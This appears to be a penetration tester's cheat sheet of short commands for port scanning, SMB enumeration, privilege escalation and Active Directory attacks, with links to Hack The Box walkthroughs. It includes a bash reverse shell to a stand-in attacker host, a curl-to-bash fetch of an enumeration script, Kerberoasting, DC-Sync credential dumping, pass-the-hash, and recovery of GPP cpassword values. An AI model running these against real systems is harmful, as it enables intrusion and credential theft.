Some books you want to read:
- The OSINT Handbook: A practical guide to gathering and analyzing online information
- Advanced Penetration Testing with Kali Linux: Unlocking industry-oriented VAPT tactics
- Fighting Phishing: Everything You Can Do to Fight Social Engineering and Phishing
usefull tips and tools for hacking
- create a file with a range of ip addresses: seq -f "10.10.10.%g" 1 254 > ip.txt
- or use prips 10.0.0.0/23 > ip.txt (first install prips: apt install prips)
- echo $HISTFILE to check the history file location
Port scan commands
- nmap -T4 -sV -sT --reason -p1-65535 --vv -oN 'filename' 'IP'
- nmap -sC -sV -oA filename ip - ippsec parameters
- nmap --script vuln 'IP'
- nmap -sV -sC -A -oN filename ip
- unicornscan -r300 -mU 'IP' - UDP scan. USE -mT for TCP
IpSec
- python -m SimpleHTTPServer PORT
- curl IP:PORT/LinEnum.sh | bash
SMB scan
- smbclient -N //ip/sharename
Priv Esc
Shell
- python -c 'import pty; pty.spawn("/bin/sh")'
- python -c 'import pty; pty.spawn("/bin/bash")'
- bash -c 'bash -i >& /dev/tcp/YOURIP/PORT 0>&1'
- when having a shell type CTRL-Z to background the shell. then type stty raw -echo and then fg
WPscan
- wpscan -u URL -eu -ep -et
IPSEC hackthebox
- juicypotato windows priv esc - Conceal https://www.youtube.com/watch?v=1ae64CdwLHE
- setuid viewuser - Irked https://www.youtube.com/watch?v=OGFTM_qvtVI
- hackthebox squid server - https://www.youtube.com/watch?v=5wyvpJa9LdU
Bloodhound
- wget -O - https://debian.neo4j.org/neotechnology.gpg.key | sudo apt-key add -
- echo 'deb https://debian.neo4j.org/repo stable/' | sudo tee /etc/apt/sources.list.d/neo4j.list
- sudo apt-get update
- apt-get install neo4j
- apt-get install bloodhound
- neo4j start (set the admin password in the browser)
- bloodhound
Screenshot
- gowitness-2.1.2-windows-amd64.exe scan --cidr 192.168.230.0/24 --threads 10
- gowitness-2.1.2-windows-amd64.exe scan -f ip_in_file.txt --threads 10
- gowitness-2.1.2-windows-amd64.exe report serve
Procdump
cpassword
- findstr -S cpassword $env:logonserver\sysvol\*.xml
- crack passwords with https://github.com/t0thkr1s/gpp-decrypt
Find string with grep
- grep -oP '(?<="InsertSearchString": ")[^"]*'
Run pingcastle fromt CMD
- PingCastle.exe --server dc.local --user xxxx --password xxxx --healthcheck
- PingCastle.exe --server x.x.x.x --export users --user domainuser --password domainpassword
Find in Linux
- find -L . -name "foo*"
Kerberos attacks
- From a non-domain PC: python GetUsersSPN.py -dc-ip x.x.x.x bla.local/account:password -request
- or from a domain joined PC python GetUsersSPN.py bla.local/account:password -request
- DC-Sync attack: python secretsdump.py bla.local/account:password@dc1.bla.local
- if that works you can use python wmiexec.py bla.local/account@dc1.bla.local -hashes "insert hash"
find installed MSI's
- Get-WmiObject Win32_Product | Format-Table IdentifyingNumber, Name wmiexec /fa ID
Blacklist IP's when installing letsenscrypt 180.188.243.95 79.137.68.184 134.122.89.242 144.126.198.24 51.81.245.138 45.142.96.48 168.151.165.42 180.149.11.253 119.12.180.71 18.170.66.210 161.35.246.138 51.75.141.254 46.246.122.80 34.220.105.216 185.220.100.247 104.129.18.188 154.47.30.167 84.247.116.160 45.87.212.76 104.244.209.36 34.248.137.227 54.247.57.72 37.19.210.17 66.115.189.222 51.81.46.212 135.148.100.196 96.9.246.196 5.181.234.134 104.166.80.40 104.166.80.254 45.56.71.92 79.125.7.88 66.115.165.233